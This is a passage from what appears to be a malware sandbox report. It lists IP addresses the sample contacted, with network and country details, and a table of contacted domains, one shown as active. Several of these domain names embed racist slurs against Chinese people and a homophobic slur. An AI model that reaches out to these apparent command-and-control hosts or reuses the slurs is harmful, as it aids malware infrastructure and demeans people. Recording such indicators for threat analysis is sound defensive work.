47406 RLNET-ASIT false
216.63.4.165
 unknown United States
7018 ATT-INTERNET4US false
126.72.193.108
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
151.234.89.74
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR false
161.162.127.193
 unknown United States
263740 CorporacionLaceibanetsocietyHN false
181.99.116.179
 unknown Argentina
7303 TelecomArgentinaSAAR false

Contacted Domains

Name IP Active
infectedchink.pirate 5.181.80.61 true
chinklabs.dyn. [malformed] unknown unknown
hiakamai.dyn. [malformed] unknown unknown
netfags.geek. [malformed] unknown unknown
dogeatingchink.parody. [malformed] unknown unknown
infectedslurs.geek. [malformed] unknown unknown
yellowchink.pirate. [malformed] unknown unknown
freethewind.parody. [malformed] unknown unknown
dogeatingchink.parody unknown unknown
w3d0ntlikebot5.parody. [malformed] unknown unknown